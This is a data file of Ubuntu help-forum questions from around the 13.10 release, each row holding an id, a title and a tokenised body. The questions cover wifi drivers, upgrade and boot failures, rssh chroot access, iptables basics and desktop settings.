361255	wifi wo n't work on another kernel version	i 've got a problem about the detection of my wifi card on other linux kernel versions . when i run ifconfig , the card wo n't be listed in the network interfaces . the command line sudo ifup ra0 shows the following : ifup : failed to open statefile /run/network/ifstate : permission denied i currently use the `` 3.8.0-25-generic x86_64 '' kernel version in order for me to be able to connect to wifi . all other kernel versions simply wo n't allow it . i want to solve this issue before upgrading on 13.10 ( i do n't think upgrading will solve it at all , or will it ? ) . here are all the informations needed : command lines results under working kernel : http : //pastebin.com/mffzz6an command lines results under other kernels : http : //pastebin.com/avbsmzx3 thank you very much for your help .
361256	can i distribute the ubuntu restricted extras package ?	there are couple of friends of mine who would like to give ubuntu a try . i do n't think they 'd be pleased to know that they wo n't be able to play their music or movie collection when they install it . some of them do n't have an internet connection to download the package . so i was wondering if i could distribute the ubuntu restricted extras package with the ubuntu cd image . am i allowed to do so ? or does it violate copyright ?
361258	after upgrading 13.10 black screen shows up after login ?	my motherboard : gigabyte h61m s2p graphic : intel速 ivybridge desktop x86/mmx/sse2 after upgrading to 13.10 from 13.04 , black sceen shows up after login session , it takes 15 sec . and desktop appears normally ! ! how can i fix this bug ! !
361260	im a developer is ubuntu mobile going to work on my motorola atrix 2 ?	development phone is an atrix 2 and im in no position to afford a nexus what can i expect upon installation ?
361261	ubuntu windows installer downloads 64 bit kubuntu for my 32 bit system	i got the ubuntu windows installer because i figured it would be the simplest way to try kubuntu out with windows 7 still present on the machine . anyway , i started downloading then i noticed the name of the file it 's downloading and it 's the 64 bit version of kubuntu even though i 'm running 32 bit windows 7 and i do n't think my machine would support 64 bit anything . and there 's no way to change the version . how do i fix this ? i also noticed it 's downloading an older version of kubuntu than the only version you can download from the kubuntu site , is that normal ? thanks .
361263	rssh with chroot	( i changed the ip address and port to protect the innocent . ) on the server , my /etc/passwd entry , /etc/rssh.conf , and the file i 'm trying to access look like this : lawsa @ bukavu : /mnt/share/public $ grep steve ! $ grep steve /etc/passwd steve : x:1006:1006 : steve , home , , , i 'm steve . : /home/steve : /usr/bin/rssh lawsa @ bukavu : /mnt/share/public $ grep -v '^ # ' /etc/rssh.conf logfacility = log_user allowscp allowsftp umask = 707 user=steve:777:111111 : /mnt/share lawsa @ bukavu : /mnt/share/public $ ll /mnt/share/public/hey -rw-rw-r -- 1 lawsa lawsa 5 sep 10 18:49 /mnt/share/public/hey lawsa @ bukavu : /mnt/share/public $ on the client , we have this : lawsa~/cnc/it $ sftp -p `` $ ( < bukavuport ) '' `` steve @ $ ( < churchip ) : /public/hey '' steve @ x.x.x.x 's password : connection closed lawsa~/cnc/it $ scp -p `` $ ( < bukavuport ) '' `` steve @ $ ( < churchip ) : /public/hey '' ./hey steve @ x.x.x.x 's password : lawsa~/cnc/it $ l hey ls : can not access hey : no such file or directory lawsa~/cnc/it $ scp -p `` $ ( < bukavuport ) '' `` steve @ $ ( < churchip ) : /mnt/share/public/hey '' ./hey steve @ x.x.x.x 's password : lawsa~/cnc/it $ l hey ls : can not access hey : no such file or directory lawsa~/cnc/it $ sftp -p `` $ ( < bukavuport ) '' `` steve @ $ ( < churchip ) : /mnt/share/public/hey '' steve @ x.x.x.x 's password : connection closed lawsa~/cnc/it $ verbose for the morose : lawsa~/cnc/it $ sftp -v -p `` $ ( < bukavuport ) '' `` steve @ $ ( < churchip ) : /public/hey '' openssh_5.9p1 debian-5ubuntu1.1 , openssl 1.0.1 14 mar 2012 debug1 : reading configuration data /etc/ssh/ssh_config debug1 : /etc/ssh/ssh_config line 19 : applying options for * debug1 : connecting to x.x.x.x [ x.x.x.x ] port 22. debug1 : connection established . debug1 : identity file /home/lawsa/.ssh/id_rsa type 1 debug1 : checking blacklist file /usr/share/ssh/blacklist.rsa-2048 debug1 : checking blacklist file /etc/ssh/blacklist.rsa-2048 debug1 : identity file /home/lawsa/.ssh/id_rsa-cert type -1 debug1 : identity file /home/lawsa/.ssh/id_dsa type -1 debug1 : identity file /home/lawsa/.ssh/id_dsa-cert type -1 debug1 : identity file /home/lawsa/.ssh/id_ecdsa type -1 debug1 : identity file /home/lawsa/.ssh/id_ecdsa-cert type -1 debug1 : remote protocol version 2.0 , remote software version openssh_5.9p1 debian-5ubuntu1.1 debug1 : match : openssh_5.9p1 debian-5ubuntu1.1 pat openssh* debug1 : enabling compatibility mode for protocol 2.0 debug1 : local version string ssh-2.0-openssh_5.9p1 debian-5ubuntu1.1 debug1 : ssh2_msg_kexinit sent debug1 : ssh2_msg_kexinit received debug1 : kex : server- > client aes128-ctr hmac-md5 none debug1 : kex : client- > server aes128-ctr hmac-md5 none debug1 : sending ssh2_msg_kex_ecdh_init debug1 : expecting ssh2_msg_kex_ecdh_reply debug1 : server host key : ecdsa 21:18:4d:52 : a2:78:71:62 : c3 : de : f2 : eb : ae:85:80:71 debug1 : host ' [ x.x.x.x ] :22 ' is known and matches the ecdsa host key . debug1 : found key in /home/lawsa/.ssh/known_hosts:20 debug1 : ssh_ecdsa_verify : signature correct debug1 : ssh2_msg_newkeys sent debug1 : expecting ssh2_msg_newkeys debug1 : ssh2_msg_newkeys received debug1 : roaming not allowed by server debug1 : ssh2_msg_service_request sent debug1 : ssh2_msg_service_accept received debug1 : authentications that can continue : publickey , password debug1 : next authentication method : publickey debug1 : offering rsa public key : /home/lawsa/.ssh/id_rsa debug1 : authentications that can continue : publickey , password debug1 : trying private key : /home/lawsa/.ssh/id_dsa debug1 : trying private key : /home/lawsa/.ssh/id_ecdsa debug1 : next authentication method : password steve @ x.x.x.x 's password : debug1 : authentication succeeded ( password ) . authenticated to x.x.x.x ( [ x.x.x.x ] :22 ) . debug1 : channel 0 : new [ client-session ] debug1 : requesting no-more-sessions @ openssh.com debug1 : entering interactive session . debug1 : sending environment . debug1 : sending env lang = en_us.utf-8 debug1 : sending subsystem : sftp debug1 : client_input_channel_req : channel 0 rtype exit-status reply 0 debug1 : client_input_channel_req : channel 0 rtype eow @ openssh.com reply 0 debug1 : channel 0 : free : client-session , nchannels 1 debug1 : fd 0 clearing o_nonblock transferred : sent 2216 , received 1648 bytes , in 0.0 seconds bytes per second : sent 84496.9 , received 62838.9 debug1 : exit status 1 connection closed lawsa~/cnc/it $ the logs on the server : lawsa @ bukavu : /var/log $ tail -n 50 auth.log oct 18 14:03:41 bukavu sshd [ 17033 ] : accepted password for steve from y.y.y.y port 36729 ssh2 oct 18 14:03:41 bukavu sshd [ 17033 ] : pam_unix ( sshd : session ) : session opened for user steve by ( uid=0 ) oct 18 14:03:41 bukavu sshd [ 17049 ] : received disconnect from y.y.y.y : 11 : disconnected by user oct 18 14:03:41 bukavu sshd [ 17033 ] : pam_unix ( sshd : session ) : session closed for user steve lawsa @ bukavu : /var/log $ if i remove the line in rssh.conf ( so there is no chroot ) , and ensure that the client asks for the absolute path , this works just fine . please let me know why you think the file is n't copying properly by either scp or sftp in the chroot ; thanks !
361267	gmail webapps and 13.10 - unity and message me menu integration	i 've just installed 13.10 and while i was using firefox , the system prompted me to install the webapps for sites like gmail , facebook , launchpad , and so on . what happens is that , after the first moment of the installation , the unity icon that appear for gmail app remains as only an icon that opens another window directly into gmail . before , there was an integration with unity because when clicking the icon it directed me to the tab where gmail was opened in firefox . besides the unity integration there 's the message menu integration . with facebook app , i receive notifications on the me menu near the watch whenever someone sends a message , but with gmail it 's null , it does n't even appear in the me menu . it happens with firefox and chrome . any clues ?
361268	how to set compose key to pause in 13.10 ?	in ubuntu 13.04 i had my compose key set to pause ( by going to sytem settings , then keyboard_layout , option , and changing the compose key setting ) . in 13.10 the keyboard settings have been totally rearranged : the compose key is now set by going to keyboard in system settings , hitting the shortcuts tab , then the typing menu . however , there is no option to select pause . how can i set the compose key to whatever key i want ? thanks !
361269	ubuntu installation error	i am just a beginner for linux.please help me to install ubuntu 12.04 lts into my asus x402ca win8 brand new , i need dual boot , i didt have cd drive in it..i created the live usb , from that i ca n't move to next steps .please give me brief explanation and screen shots , if its possible ! ! ! thank you .
361271	can not make live usb stick	when i try to make a live disk from an iso i have downloaded usb-creator-gtk will not show the iso i select in the top box and it will not recognize my usb stick as the destination . i an read and write to the usb stick , copy files to and from the stick . i have tried several . i would like to make a live usb stick of a different distro than i am using and run it from the stick so i do not ruin the working ubunto 12.04 lts that came with the asus 1015e that does not have a dvd drive . i have a external dvd writer but i have not used it with thiss laptop and a usb stick is so much easier to manage . i have looked but not found my problem/solution here thanx scott
361273	ubuntu 13.04 youtube/video freeze	i seem to be having an issue in which video [ youtube or otherwise ] will cause the system to completely freeze . does anybody know how to fix this or what might be causing the problem ?
361278	what size cd/dvd do i need to burn ubuntu on ?	how large of a cd or dvd do i need in order to burn the installation iso onto either ? i currently have a memorex cd-r , which is 700 mb , but it is apparently too small . i 'm wanting to get ubuntu 13.10 . does the cd have to have to save space as the size of the original iso ?
361280	which codecs does ubuntu-touch support ?	which codecs does ubuntu-touch support ? can i add restricted-codecs package ? i 've copied an .avi file to ubuntu-touch , and i can hear it , but i ca n't see anything .
361285	compiling rtl8188ee driver fails	i am trying to compile and install the proprietary driver for my rtl8188ee wireless card . using make in the download directory ( /home/sebastian/downloads/rtl_92ce_92se_92de_8723ae_88ee_linux_mac80211_0012.0207.2013 ) results in following error : make -c /lib/modules/3.8.0-31-generic/build m=/home/sebastian/downloads/rtl_92ce_92se_92de_8723ae_88ee_linux_mac80211_0012.0207.2013 modules make [ 1 ] : betrete verzeichnis '/usr/src/linux-headers-3.8.0-31-generic' cc [ m ] /home/sebastian/downloads/rtl_92ce_92se_92de_8723ae_88ee_linux_mac80211_0012.0207.2013/base.o in file included from /home/sebastian/downloads/rtl_92ce_92se_92de_8723ae_88ee_linux_mac80211_0012.0207.2013/base.c:39:0 : /home/sebastian/downloads/rtl_92ce_92se_92de_8723ae_88ee_linux_mac80211_0012.0207.2013/pci.h:247:15 : fehler : expected »=« , » , « , » ; « , »asm« or »__attribute__« before »rtl_pci_probe« make [ 2 ] : *** [ /home/sebastian/downloads/rtl_92ce_92se_92de_8723ae_88ee_linux_mac80211_0012.0207.2013/base.o ] fehler 1 make [ 1 ] : *** [ _module_/home/sebastian/downloads/rtl_92ce_92se_92de_8723ae_88ee_linux_mac80211_0012.0207.2013 ] fehler 2 make [ 1 ] : verlasse verzeichnis '/usr/src/linux-headers-3.8.0-31-generic' make : *** [ all ] fehler 2 what exactly is the problem and how can i fix it ? using raringx64
361287	trying to upgrade fro 13.04 to 13.10	i have reported my problem as a bug bugs.launchpad.net/ubuntu the problem i have is that when offered an upgrade from 13.04 to saucy salamander ( 13.10 ) i get the following errors : followed by : is this a bug , or is it because i have downloaded and installed unofficial software packages not supported by ubuntu ? update rc account-plugin-salut 3.6.4-0ubuntu4.1 amd64 messaging account plugin for local xmpp ( salut ) rc alltray 0.71b-1 amd64 dock any program into the system tray rc cmake-data 2.8.10.1-0ubuntu6 all cmake data files ( modules , templates and documentation ) rc empathy 3.6.4-0ubuntu4.1 amd64 gnome multi-protocol chat and call client rc firefox 22.0+build2-0ubuntu0.13.04.2 amd64 safe and easy web browser from mozilla rc gnustep-base-common 1.24.0-1ubuntu1 all gnustep base library - common files rc gnustep-base-runtime 1.24.0-1ubuntu1 amd64 gnustep base library - daemons and tools rc gnustep-common 2.6.2-2 amd64 common files for the core gnustep environment rc libavcodec53 : amd64 6:0.8.6-1ubuntu2 amd64 libav codec library rc libavutil51 : amd64 6:0.8.6-1ubuntu2 amd64 libav utility library rc libgnustep-base1.24 1.24.0-1ubuntu1 amd64 gnustep base library rc libgnustep-gui0.22 0.22.0-1ubuntu1 amd64 gnustep gui library rc libobjc4 : amd64 4.7.3-1ubuntu1 amd64 runtime library for gnu objective-c applications rc libplotmm0 : amd64 0.1.2-2 amd64 gtkmm plot widgets for scientific applications rc lightdm-remote-session-uccsconfigure 1.1-0ubuntu2 amd64 session and configuration to login to configure uccs rc mcp-account-manager-uoa 3.6.4-0ubuntu4.1 amd64 gnome multi-protocol chat and call client ( uoa plugin ) ii sysv-rc 2.88dsf-13.10ubuntu15 all system-v-like runlevel change mechanism rc unison-gtk 2.40.65-1ubuntu1 amd64 file-synchronization tool for unix and windows with gtk+ interface rc unison2.27.57-gtk 2.27.57-7 amd64 file-synchronization tool for unix and windows with gtk+ interface rc unison2.32.52-gtk 2.32.52-6ubuntu1 amd64 file-synchronization tool for unix and windows with gtk+ interface rc unity-webapps-common 2.4.14-0ubuntu1 all unity webapp integration scripts rc volumecontrol.app 0.5-3.1build1 amd64 audio mixer for gnustep rc xul-ext-ubufox 2.6-0ubuntu1 all ubuntu-specific configuration defaults and apt support for firefox
361292	firefox startpage	when i got my new asus netbook , i could click on the firefox icon on the left margin and i got the mozilla firefox startpage and could type in any website i wanted . now i get the ubuntu startpage instead . i really want the firefox startpage . how do i get it ? i downloaded the safari browser but do n't know how to install it , so its icon does not appear .
361296	specify hinting for a certain font	i am using droid fonts were possible . i have kde . droid fonts look perfect with full hinting , but ubuntu font do not . ubuntu font looks good with no or slight hinting , but then droid fonts look bad . is there a possibility to specify hinting type per font family ? i tried the following in fonts.conf , but it does n't work : < match target= '' pattern '' name= '' family '' > < test name= '' family '' qual= '' any '' > < string > ubuntu < /string > < /test > < edit binding= '' strong '' mode= '' assign '' name= '' hintstyle '' > < const > hintnone < /const > < /edit > < /match > < match target= '' font '' > < edit mode= '' assign '' name= '' rgba '' > < const > none < /const > < /edit > < /match > < match target= '' font '' > < edit mode= '' assign '' name= '' hinting '' > < bool > true < /bool > < /edit > < /match > < match target= '' font '' > < edit mode= '' assign '' name= '' hintstyle '' > < const > hintfull < /const > < /edit > < /match > < match target= '' font '' > < edit mode= '' assign '' name= '' antialias '' > < bool > true < /bool > < /edit > < /match >
361297	beginner help configuring iptables	i have just started to configure iptables and i am wondering what basic rules you would recommend that i use for the things that i need . here is what i am doing : i want my default policies for input , forward , and output to be drop i use ssh and an ssh tunnel through port 80 i run a server off of port 25565 please let me know what i can do . thanks
361299	ffmpeg2 on ubuntu 12.10 quantal server	currently i 'm stuck with installing ffmpeg2 via the repository ppa : samrog131/ppa . why it does n't work ? on various sites it 's been said , that the ppa is for ubuntu 12.10 . am i doing something wrong ? because it is installing ffmpeg from standard ubuntu repository ( 0.8.6 ) hope anybody could help : /
361303	can i install ubuntu on my sk17i	i am a student who like to try new os and applications . i have sony xperia mini pro so is it possible to install ubuntu on my device when i see the ubuntu phone video it was awesome os , can u tell me how to install ubuntu on my xperia mini pro sk17i its already rooted and bootloader unlocked
361304	why am i unable to get webgl ?	so i 've been trying all day to get webgl running on my ubuntu 13.10 system , to no avail . here is the output of my chrome : //gpu page in the latest google chrome : http : //jsbin.com/eroledi/1/ i 've tried downloading and running the latest ati catalyst ( which kills my display entirely , giving me a black screen and cursor ) . i 've also tried enabling the propriatery drivers in the system settings . i 've also disabled `` use hardware acceleration when available '' in chrome , as suggested . i bought my radeon hd 6450 this week , so it should be able to cope . it does seem to be compatible with webgl , but how can i tell if the drivers in use are greater than `` amd drivers 8.98 '' - here is the info available to me . any ideas ?
361310	can not access the filesystems using livecd ( lvm2 , ext2 )	i have to restore the /etc/passwd file i accidentally renamed in my ubuntu server , so i booted the machine using a livecd . problem is , the system filesystem does not appear in nautilus , under 'devices ' . am i missing anything ? ubuntu @ ubuntu : ~ $ sudo fdisk -l disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000956dc device boot start end blocks id system /dev/sda1 * 2048 499711 248832 83 linux /dev/sda2 501758 625141759 312320001 5 extended /dev/sda5 501760 625141759 312320000 8e linux lvm ubuntu @ ubuntu : ~ $ mount /cow on / type overlayfs ( rw ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) /dev/sr0 on /cdrom type iso9660 ( ro , noatime ) /dev/loop0 on /rofs type squashfs ( ro , noatime ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) tmpfs on /tmp type tmpfs ( rw , nosuid , nodev ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) gvfs-fuse-daemon on /home/ubuntu/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev , user=ubuntu ) ubuntu @ ubuntu : ~ $ sudo blkid /dev/loop0 : type= '' squashfs '' /dev/sda1 : uuid= '' aad69790-198d-45bc-9ccd-e4cba7456914 '' type= '' ext2 '' /dev/sda5 : uuid= '' wbidx7-rill-vtft-gx15-n1gj-yyfg-v8oe5m '' type= '' lvm2_member '' /dev/sr0 : label= '' ubuntu 12.04 lts i386 '' type= '' iso9660 '' ubuntu @ ubuntu : ~ $ cat /etc/fstab overlayfs / overlayfs rw 0 0 tmpfs /tmp tmpfs nosuid , nodev 0 0
361313	can not connect to server	i have a home network with several windows machines and several printers . when trying to access files on the windows machines , from the `` files '' dropdown i click on `` connect to server . '' when the option box opens i enter the server ip address or smb location , but the `` connect '' button remains grayed out . this method works with linuxmint , but not with ubuntu or fedora . samba is installed . this same option worked with 12.04 .
361314	failed to load session `` ubuntu '' - ubuntu 13.10 on macbook pro	i 've installed ubuntu 13.10 on my macbook pro 7 , 1 and have run into difficulties . on my first reboot of this freshly installed system , i can not log in to the default graphical session . after i log in from the login screen , i am briefly presented with the following error message : '' failed to load session `` ubuntu '' then , i am returned to the login screen . when i look at /var/log/syslog , i see an awful lot of what appear to be nouveau-related errors . how should i proceed ? ! thanks for any help !
361316	i need help with getting onscreen console for mupen64plus	i would like an on screen console to launch n64 roms but im not understanding new to linux please please help me understand love ubuntu but need help
361319	ubuntu 13.10 stucks after prepare step	i am trying to install ubuntu 13.10 amd64 on a sony vaio sve14afbb with windows 7 and uefi system . i could mount the windows and sony system partitions on trying ubuntu . but when i go to installion is stucks after the prepare step . it recognizes that is necessary to unmount partitions , i select yes and after this the installation stucks with the waiting mouse pointer .
361320	how can i enable zswap ?	ubuntu 13.10 's release notes mention that it includes linux 3.11 , which supports something called zswap : zswap is a lightweight , write-behind compressed cache for swap pages . it takes pages that are in the process of being swapped out and attempts to compress them into a dynamically allocated ram-based memory pool . if this process is successful , the writeback to the swap device is deferred and , in many cases , avoided completely . this results in a significant i/o reduction and performance gains for systems that are swapping that sounds cool . how can i try it out ?
361324	upgrade to 13.10 , upgrade app halted	i 'm trying to upgrade to 13.10 , and the upgrader/installer app has stopped . it does n't seem to be frozen- it gives me a warning if i try to quit it , but it has been stuck like this for hours now . the internet connection is fast and working . am i going to break things horribly if i quit it and restart ?
361331	how to make window topbars dark in ubuntu 13.10 and cinnamon ?	i am currently running ubuntu 13.10 , cinnamon , and i have the theme minty . i am , unfortunately , a perfectionist and if everything is n't exactly how i like it , it really gets on my nerves . as you can see in this picture , there is a white bar at the top of my applications . i really want to get rid of it and make it dark ( i can make the application theme dark , but not the top bar using gnome tweak ) . how can i change it ? thank you !
361332	ubuntu 13.04 to 13.10 : filesystem check or mount failed	i attempted to upgrade from ubuntu 13.04 to 13.10 today , and mid upgrade the system started flaking out , and eventually locked up entirely . i was forced to restart the computer , and am now unable to get the computer to boot up at all . when i boot currently , it takes me to the grub menu , and i can choose to boot normally , or boot in an older version . i have tried several things , which i list below , but no matter what , when i try to finish booting into ubuntu , i receive the following error : filesystem check or mount failed . a maintenance shell will now be started . control-d will terminate this shell and continue booting after re-trying filesystems . any further errors will be ignored root @ ubuntu-computername : ~ # i have fun fsck -f and everything appears correct , no errors are reported . and it passes all 5 checks . if i run fdisk -l then i get the following information : disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 4096 bytes / 4096 bytes disk identifier : 0x00010824 device boot start end blocks id system /dev/sda1 * 2048 608456703 304227328 83 linux /dev/sda2 608458750 625141759 8341505 5 extended partition 2 does not start on physical sector boundary . /dev/sda5 608458752 625141759 8341504 82 linux swap / solaris disk /dev/sdb : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x0fb4b7e8 device boot start end blocks id system /dev/sdb1 8192 625139711 312565760 7 hpfs/ntfs/exfat i am considering just installing a new os on the other disk , that currently has nothing on it , and then just attempting to scrape my data off the old disk ( thankfully i did n't encrypt the files ) . really my question is this : can i salvage this ubuntu install , or should i give up and just reinstall ?
361333	how to uninstall a downloaded application from ubuntu system ?	i have downloaded an application on ubuntu call educationsuite gcompris . i want to unistall it . how do i do that ?
361334	any luck installing 13.10 on nexus 4 ?	running ubuntu 13.10 in virtualbox . everything went fine as far as that goes however , after following the directions to load it onto phone ( sudo add-apt-repository ppa : phablet-team/tools ) and then sudo apt-get update , i try and install the phablet tools , adb , fastboot , but it 's unable to find the packages . it 's probably something dumb i 'm doing but i ca n't figure it out . any ideas ?
361335	ubuntu gnome 13.10 can not change window border theme	i installed ubuntu gnome 13.10 and when i change gtk theme using gnome tweak tool , only theme of widgets changes , theme of window border remains same . can somebody help me to fix this issue ?
361337	lightdm not starting x	after upgrading ubuntu to 13.10 , i have a problem . after i login , all i get is a black screen , and i have to hit control+alt+f1 , relogin , and type startx . how can i make it so that lightdm will automatically start the x server ?
361340	trouble upgrading from 13.04 to 13.10	i am having trouble upgrading from ubuntu 13.04 to 13.10 . i got a notification to upgrade to 13.10 and then the following happens : i click on the upgrade option give my password for authentication i click upgrade again when the `` welcome to ubuntu 13.10 saucy salamander '' page opens up the computer attempts to download the release tools and then nothing happens , that 's it . my computer is an asus eee pc 1000ha netbook . it 's a 2008 model i bought in 2009 . any suggestions ? should i just wait for ubuntu to work out the kinks or is there something i need to do on my end ? any info would be great !
361346	unable to start after 13.04 > 13.10 udate	at the end of the update process , clicking on the restart button had no visible effect whatsoever . after waiting 5 to 10 minutes , i decided to reboot the computer manually . since then , i rebooted a good dozen times ( not with the hope that it would work but with the hope of reading the messages ) with the same non-result and the same symptoms : i get the ascii text-on-purple ubuntu 13.10 . . . . splash screen with these messages : * restoring resolver state ... [ ok ] * starting crash report submission daemon [ ok ] * starting cups printing spooler/server [ ok ] everything disappears . the whole process hangs at a purple screen with the mouse cursor right in the middle . at this point , i 'm unable to use the mouse and the keyboard . booting from a 12.04 cd works perfectly , disk utility says that all my disks are ok and i can mount my main partition without problems . something obviously went wrong at the end of the upgrade but i have no idea what . i 'd appreciate any pointer . this is the kind of moment where you really think `` next time , i 'll separate my /home partition for sure '' . my machine is an aging but working dell inspiron 530 with an intel core duo e2160 processor , 2 ghz of ram and an ati radeon hd3650 video card . thanks . ( edit ) i had a 12.04 cd in a drawer so i spent the whole day doing the upgrade dance : 12.04 - > 12.10 - > 13.04 - > 13.10 everything went well during the three first steps but i get the same result after the 13.10 upgrade .
361347	how to install themes in ubuntu ?	i want to install the `` zoncolorxtra-redmond '' theme on ubuntu 13.10 . what is the easiest way to do so ?
361348	efi and working lvm partman-auto/expert_recipe ?	i have an lvm based recipe that used to work on non-efi based systems . how do i recreate the same recipe so that it works in efi/uefi mode ? i have the following recipe right now ( and i 've tried others too ) , but it fails with the message : `` the attempt to mount a file system with type vfat in scsi5 ( 2,0,0 ) , partition # 1 ( sda ) at /boot/efi failed . '' d-i partman-auto/expert_recipe string \ boot-root-swap : : \ 200 50 200 ext2 \ $ primary { } \ $ bootable { } \ method { format } format { } \ use_filesystem { } filesystem { ext2 } \ mountpoint { /boot } \ . \ 48000 70 1000000000 ext4 \ $ defaultignore { } \ $ lvmok { } \ lv_name { base } \ method { format } \ format { } \ use_filesystem { } \ filesystem { ext4 } \ mountpoint { / } \ . \ 8000 60 24000 linux-swap \ $ defaultignore { } \ $ lvmok { } \ lv_name { swap } \ method { swap } \ format { } \ .
361354	can not find package	so , i keep getting `` can not find package '' whenever i try to install anything , but my update and upgrade seems to work just fine . i 've gone through several `` fixes '' but none of them do anything .
361355	`` operating system not found '' after upgrading to 13.10	i own a thinkpad x121e and i upgraded its ubuntu from 13.04 64bit to 13.10 64bit using the update manager . when the upgrade process suggested to restart the system , i restarted the computer and now it says `` operating system not found '' after a very brief splash screen . the splash screen says something like ( too brief to see everything ) : intel undi , pxe-2.0 ... for atheros ethernet controller ... check cable connection ! pxe-mof : exiting intel pxe rom i prepared a startup usb disk using ubuntu 13.10 . i tried the startup usb and it works very well on other computers . so i changed the booting order of x121e and tried all three usb slots , all said `` operating system not found '' without any splash screen . i also tried using startup usb with 12.04 lts . same results . i do not really want to reinstall the system now . any hints on how to proceed ? ps . i have tested the memory and hard drive using lenovo software and both passed the test . problem solved : 1 . it turned out the usb was formatted in ntfs by default on a windows machine . changing it to fat32 makes the laptop recognizes it ; 2 . after booting from the usb , i installed and ran boot-repair and the system is fixed .
361356	minimum system reqirerments for ubuntu 13.10	i 'm new to linux and i was just wondering what the minimum system requirement for ubuntu 13.10 were . any help would be greatly appreciated .
361359	how to keep application running on external monitor when ubuntu locked	i would like to keep a dashboard-style app running full-screen on one of my monitors while i 'm away from my computer . ( and the computer is locked . ) i do n't need any user input in the application , i 'd just like at least one monitor to not switch off after a while when my computer is locked . has anyone done something similar ? or am i better off running a dashboard on a separate computer ?
361360	youtube in sound menu 13.10	after upgrading to 13.10 , i noticed youtube has been added to the sound menu . if i click on the play icon , firefox opens and redirects to youtube that ok , but what is the purpose as it plays no music ? also , the play icon in sound menu is replaced by a dotted circle , even if youtube is off . bug ?
361365	unable to change brightness with ubuntu 13.10 on asus 453t series ( it worked with ubuntu 13.04 )	the brightness icon is shown but nothing happens . even if i try to change the brightness in `` system settings '' nothing happens . the thing is it did n't happen with ubuntu 13.04 , so i would like to know how to solve it or how to erase the upgrade to use the 13.04 version .
361367	can i safely remove pre-installed software in ubuntu 13.10 ?	i uses a lots of google apps product in my laptop , tablet and mobile . since i never use all pre-installed software in ubuntu , can i remove it ? e.g like : libreoffice | i use google doc etc . rhythmbox | i use google play music thunderbird | i use gmail , do n't like client videos | watch online messaging | hangouts and other softwares like remmina client , bittorrent client . can i simply remove it in ubuntu software centre ? i like my laptop clean and having unmessy software that i never use . i normally use chromium browser to do all the stuff , i think i am heavy user of google , and love the simplicity of ubuntu . lol ! can anyone tell or guide me ? thanks !
361370	compiz / unity permission problem ?	i have a big problem here . so the problem in short : i ca n't change my background , and the compiz launcher wo n't save stuff i put there . what happened before this happened you might ask ? well i reinstalled ubuntu from 13.04 to 12.04 lts because it refused to let me login . my setup : i have 3 hdd's one mounted on / ( 12.04 lts ) and one mounted on /home and windows 7 c : i do n't really use it . ( only for windows games that ca n't be played though wine ) i reinstalled ubuntu tons of times ( and used it ) so my /home/ ( user ) is filled with configuration files of programs . i also have my /home encrypted . why do i think it 's a permission problem ? because it seems i have no permission to change my background or save thing on compiz launcher . any kind of help would be much appreciated . thanks for reading .
361375	why do some urls in firefox change when copy / paste ?	this may not be a firefox / ubuntu specific issue . when i copy / paste a web link with _ and ( ) it is rendered as % 20 , % 28 , and % 29 . yet in the firefox url these % symbols do not appear . the % 20 is particularly weird because the _ itself does render in the url : https : //www.capitalsecuritybank.com/en/pdf/csb_ % 20account_ % 20application_ % 20form_ % 20 % 28personal % 29.pdf can anyone explain why the url is different when copied / pasted ?
361379	no option for choosing ubuntu	i just install ubuntu 13.04 for dual booting with windows 8 . even though i 've installed ubuntu , after i restart my laptop i 'm not offered a option to choose ubuntu . only windows 8 gets started . when i restart my laptop and pressed f9 then i get a option for ubuntu . but as soon as i click on that , windows 8 gets started . one of my friend told me , that there might be problem with grub . but i do n't understand this problem .
361380	stuck on eula screen when installing netflix-desktop	i am trying to install netflix-desktop on my laptop running 13.10 . i followed the instructions here : sudo apt-add-repository ppa : ehoover/compolio sudo apt-get update sudo apt-get install netflix-destop after a while , there is a eula in my xterm that says i must agree to it to get the software . at the bottom of the screen there is 'ok' i have hit enter+a+tab , typed 'ok ' in that xterm but it never gets past that . the application is not available because if i try to launch netflix-desktop in another xterm , it does n't know what i 'm talking about and netflix is n't found on my system when i search search . can anybody tell me what i 'm supposed to do next or what i should have done so that i 'm not in this situation next time ?
361383	switching users in byobu session	i launched a byobu session ( tmux ) and then tried to switch to a user called kommander `` su - kommander '' , it immediately prompted me with : [ oh my zsh ] would you like to check for updates ? type y to update oh-my-zsh : now i usually press `` n '' and everything is fine , but within the byobu session , when i press enter it just displays a `` ^m '' character . i have no idea how to exit out if this prompt : [ oh my zsh ] would you like to check for updates ? type y to update oh-my-zsh : n^m
